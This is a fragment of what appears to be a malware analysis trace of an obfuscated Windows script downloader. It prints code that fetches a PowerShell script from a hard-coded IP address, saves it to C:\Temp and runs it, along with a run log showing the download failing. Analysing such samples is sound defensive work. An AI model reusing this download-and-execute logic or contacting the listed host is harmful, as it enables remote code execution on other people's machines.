                                                                                                            LogError ( 'Failed\x20to\x20execute\x20PowerShell\x20script:\x20' + f[l ( 0x17d ) ] );
                                                                                                              70
                                                                                                              }
                                                                                                                71
                                                                                                                }
                                                                                                                  72
                                                                                                                  DownloadScript ( URL, DownloadPath ) ? RunPowerShellScript ( DownloadPath ) : ( LogError ( i ( 0x196 ) ), WScript[i ( 0x181 ) ] ( ) );
                                                                                                                  • DownloadScript("http://176.65.144.3/host/STEPHH.ps1","C:\Temp\QCCZXZFSSHSHSJ.ps1") ➔ false
                                                                                                                  • i(406) ➔ "Exiting script due to download failure."
                                                                                                                  • LogError("Exiting script due to download failure.") ➔ undefined
                                                                                                                  • i(385) ➔ "Quit"
                                                                                                                  • Show all Function Runs